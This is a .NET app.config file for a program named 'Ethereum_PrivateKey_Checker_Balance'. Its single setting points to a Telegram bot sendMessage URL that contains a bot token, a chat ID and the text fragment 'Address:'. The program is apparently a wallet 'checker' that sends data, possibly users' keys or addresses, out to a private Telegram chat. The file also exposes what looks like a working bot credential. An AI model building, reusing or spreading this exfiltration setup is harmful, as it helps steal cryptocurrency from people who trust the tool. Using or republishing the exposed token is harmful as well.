<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="Ethereum_PrivateKey_Checker_Balance.Properties.Settings1" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7" />
    </startup>
    <userSettings>
        <Ethereum_PrivateKey_Checker_Balance.Properties.Settings1>
            <setting name="url" serializeAs="String">
                <value>https://api.telegram.org/bot7164183545:AAG0AdyOE__7cMZIVXGtAlTnao71ZS-MK2Y/sendMessage?chat_id=6790289594&amp;text=Address:</value>
            </setting>
        </Ethereum_PrivateKey_Checker_Balance.Properties.Settings1>
    </userSettings>
</configuration>